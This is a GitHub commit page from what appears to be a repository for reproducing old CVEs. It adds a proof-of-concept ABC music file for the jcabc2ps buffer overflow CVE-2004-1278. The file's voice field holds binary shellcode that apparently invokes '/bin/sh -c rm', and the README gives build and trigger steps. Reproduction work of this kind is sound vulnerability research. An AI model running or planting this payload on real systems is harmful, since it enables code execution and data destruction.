Skip to content
Permalink
Browse files

add information for CVE-2004-1271

  • Loading branch information...
mudongliang committed May 16, 2018
1 parent 4ef15bb commit 8ccb1bb646564183fa5ea8dc2f66deb58c33e0fb
Showing with 32 additions and 3 deletions.
  1. +1 −1 CVE-2004-1271/README.md
  2. +5 −0 CVE-2004-1278/74.abc
  3. BIN CVE-2004-1278/74.abc.zip
  4. +24 −0 CVE-2004-1278/README.md
  5. +2 −2 README.md
@@ -1,4 +1,4 @@
# CVE/EDB ID
# CVE-2004-1271

## Experiment Environment

@@ -0,0 +1,5 @@
X: 1
T:My New Tune
K:Bb
L:1/4
V:1�����������������������������rY�ʃ��1�A���Q���Q ���Q�A��<���A1��1�� �A!1�A*�A2�A5�����A81�I�A;A�����A<1�Q��Q��#Q��;P̀1�P@P̀����abcdefghijklmnopqrstuvwxPATH!/bin!/usr/bin!/bin/sh!-c!rm!xK^u��^u��^u��� � � 
BIN +364 Bytes CVE-2004-1278/74.abc.zip
Binary file not shown.
@@ -2,18 +2,42 @@

## Experiment Environment

Ubuntu 11.04

## INSTALL & Configuration

```
wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1278/jcabc2ps-20021002-src.tar.gz
tar -xvf jcabc2ps-20021002-src.tar.gz
cd jcabc2ps
make
```

## Problems in Installation & Configuration

## How to trigger vulnerability

```
./jcabc2ps 74.abc > 74.ps
```

## PoCs

[jcabc2ps switch_voice() overflows t1 buffer](http://securesoftware.list.cr.yp.to/archive/0/48)

[jcabc2ps Buffer Overflow in switch_voice() Lets Remote Users Execute Arbitrary Code](https://securitytracker.com/id/1012593)

[ABC2PS/JCABC2PS Voice Field Buffer Overflow Vulnerability](https://www.securityfocus.com/bid/12024/exploit)

[ABC2PS/JCABC2PS 1.2 - Voice Field Buffer Overflow](https://www.exploit-db.com/exploits/25025/)

## Vulnerability Details & Patch

### Root Cause

> In parse.c, switch_voice() copies any amount of data
> into the 201-byte t1[] array.
### Stack Trace

## References
@@ -22,9 +22,9 @@ If the vulnerability has both CVE-ID and EDB-ID, CVE-ID is preferred as its dire
- [x] CVE-2004-1261
- [x] CVE-2004-1262
- [x] CVE-2004-1265
- [ ] CVE-2004-1271
- [x] CVE-2004-1271
- [x] CVE-2004-1275
- [ ] CVE-2004-1278
- [x] CVE-2004-1278
- [ ] CVE-2004-1279
- [x] CVE-2004-1287
- [x] CVE-2004-1288

0 comments on commit 8ccb1bb

Please sign in to comment.
You can’t perform that action at this time.